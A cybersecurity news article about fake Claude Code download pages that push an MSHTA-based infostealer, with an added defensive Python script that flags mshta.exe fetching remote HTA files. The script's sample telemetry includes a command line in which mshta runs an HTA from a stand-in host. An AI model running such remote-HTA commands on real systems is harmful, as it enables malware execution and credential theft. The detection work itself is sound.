Threat Actors Using Fake Claude Code Download to Deploy Infostealer

Cybercriminals have found a new way to target developers and IT professionals by setting up fake download pages that impersonate Claude Code, a legitimate AI coding assistant.

These deceptive pages trick users into downloading what appears to be an official installation package, but instead silently deploy an infostealer malware onto the victim’s system.

The use of a well-known AI tool as bait reflects a growing trend where threat actors exploit the popularity of artificial intelligence platforms to gain trust and bypass suspicion.

The attack was first observed through a distribution campaign using it[.]com as the delivery domain.

Victims are lured to these sites, which are carefully designed to mimic the look and feel of legitimate software download portals.

Once a user clicks the download button, they receive no genuine software; instead, the downloaded file triggers a malicious execution chain the moment it is opened.

The convincing design of these fake pages gives users very little reason to question the file’s authenticity before it is too late.

Cybersecurity analyst Maurice Fielenbach noted the campaign and highlighted that the attack ends in a straightforward MSHTA-based infostealer.

He pointed out that mshta.exe, a legitimate Microsoft Windows binary, remains one of the most important processes for defenders to monitor, as it is frequently abused by attackers to run malicious HTML Application (HTA) files fetched directly from remote sources.

Fielenbach also stressed that monitoring HTA execution from remote sources is a high-signal indicator of real attacker activity.

The broader context of this campaign fits into a well-documented pattern where threat actors weaponize the growing trust people place in AI tools.

As AI-assisted coding platforms see wider adoption across developer communities, criminals find a larger pool of potential victims who may be less cautious when downloading what appears to be a legitimate productivity tool.

This is not the first time Claude-themed lures have been used — earlier campaigns exploited AI branding the same way, showing that this trend is far from isolated.

The impact of this infostealer can be severe for any affected user. Once the malware runs on a victim’s machine, it is capable of harvesting browser-stored credentials, session tokens, and other sensitive data before sending it to attacker-controlled infrastructure.

For developers who are the primary targets, the consequences extend well beyond personal data loss — compromised credentials can open doors to code repositories, cloud environments, and internal systems, potentially triggering much broader organizational security incidents.

MSHTA-Based Execution and LOLBin Abuse

The infection mechanism in this campaign centers on the abuse of mshta.exe, a signed Microsoft binary that is part of the core Windows operating system.

Since it is a trusted, system-native tool, many security products do not flag its activity by default, making it a low-profile vehicle for attackers.

This technique is a form of Living off the Land (LOLBin abuse), cataloged under MITRE ATT&CK as T1218.005 (System Binary Proxy Execution: Mshta). It allows malware to execute without dropping a traditional executable file to disk, significantly reducing its overall detection footprint.

Screenshot of the fake Claude Code download page used to lure victims into triggering the MSHTA-based infostealer execution chain (Source - LinkedIn)

When a victim interacts with the fake download page, mshta.exe is invoked to fetch and run a remote HTA file that contains embedded malicious script.

This script carries out the infostealer’s core functions — collecting credentials, browser data, and other sensitive information — entirely within memory.

The use of remote HTA execution means the payload never physically lands on the system as a standalone file, making forensic recovery considerably more difficult for incident responders after an attack.

Security teams are strongly advised to enable detailed logging for mshta.exe activity across all endpoints and flag any instance where it connects to external URLs.

Organizations should also consider restricting mshta.exe execution through application control policies where their operational requirements allow it.
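To make the logging and alerting advice above concrete, here is an added example (not code from the article or from the researcher it cites) that triages process-creation records for mshta.exe launches that pull an HTA from a remote source. The records are constructed to resemble Sysmon Event ID 1 fields (Image, CommandLine, ParentImage); the field names, the sample command lines, the reserved `.invalid` domain and the internal DNS suffix are all assumptions for illustration. It goes slightly beyond the article by distinguishing an external URL from an internal file share, so the former can be escalated first.

```python
"""Triage mshta.exe launches that fetch an HTA from a remote location.

Added example, not the article's or the cited researcher's code. Input records
are constructed to look like Sysmon Event ID 1 process-creation fields; the
field names and sample values are assumptions.
"""
import re
from ipaddress import ip_address
from urllib.parse import urlparse

# Constructed sample telemetry (not real events). Hostnames use reserved
# .invalid / .example names so nothing here resolves.
SAMPLE_EVENTS = [
    {  # mshta pulling an HTA over HTTPS from a public host, spawned by a browser:
       # the shape of the fake-download-page chain described in the article
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r'"C:\Windows\System32\mshta.exe" https://claude-code-dl.invalid/ClaudeCodeSetup.hta',
        "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
    },
    {  # mshta loading an HTA from an internal file share: remote, but lower priority
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r"mshta.exe \\fileserver01.corp.example\tools\inventory.hta",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {  # mshta running a local HTA: still worth logging, but not a remote fetch
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\helper.hta"',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {  # unrelated process with a URL on its command line: must be ignored
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": r"notepad.exe https://intranet.corp.example/notes.txt",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
]

URL_RE = re.compile(r"\bhttps?://[^\s\"']+", re.IGNORECASE)
UNC_RE = re.compile(r"\\\\[^\\\s\"']+\\[^\s\"']+")
INTERNAL_SUFFIXES = (".corp.example",)  # assumed internal DNS suffixes for this example


def is_mshta(event):
    """True when the created process image is mshta.exe, regardless of path."""
    return event["Image"].lower().rsplit("\\", 1)[-1] == "mshta.exe"


def remote_source(cmdline):
    """Return ("url", location) or ("unc", location) for a remote HTA source, else None."""
    m = URL_RE.search(cmdline)
    if m:
        return "url", m.group(0)
    m = UNC_RE.search(cmdline)
    if m:
        return "unc", m.group(0)
    return None


def host_is_internal(kind, location):
    """Classify the source host: private IP, bare hostname or assumed internal suffix."""
    if kind == "url":
        host = urlparse(location).hostname
    else:
        host = location.lstrip("\\").split("\\", 1)[0]
    host = (host or "").lower()
    try:
        return ip_address(host).is_private
    except ValueError:
        pass
    return "." not in host or host.endswith(INTERNAL_SUFFIXES)


def triage(event):
    """Score one process-creation record; None when it is not an mshta.exe launch."""
    if not is_mshta(event):
        return None
    src = remote_source(event["CommandLine"])
    if src is None:
        return {"severity": "low", "reason": "mshta.exe with local HTA", "source": None}
    kind, location = src
    internal = host_is_internal(kind, location)
    reason = f"mshta.exe fetching HTA from {'internal' if internal else 'external'} {kind}"
    # A browser parent matches the download-page lure, so call it out explicitly.
    if not internal and event["ParentImage"].lower().endswith(
        ("chrome.exe", "msedge.exe", "firefox.exe")
    ):
        reason += " spawned by a browser"
    return {"severity": "medium" if internal else "high", "reason": reason, "source": location}


def hunt(events):
    """Return (command line, triage result) for every mshta.exe launch in the feed."""
    return [(e["CommandLine"], triage(e)) for e in events if is_mshta(e)]


if __name__ == "__main__":
    for cmdline, verdict in hunt(SAMPLE_EVENTS):
        print(f"[{verdict['severity'].upper():6}] {verdict['reason']}: {cmdline}")
```

The same logic ports directly to a SIEM query: select process-creation events where the image ends in mshta.exe, then rank those whose command line contains `http://`, `https://` or a UNC path above local launches, and rank a browser parent highest, which is the combination the campaign above would produce.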

Users should always verify software downloads from official vendor sources and avoid downloading tools from third-party or unfamiliar websites, regardless of how genuine the page may appear.

The post Threat Actors Using Fake Claude Code Download to Deploy Infostealer appeared first on Cyber Security News.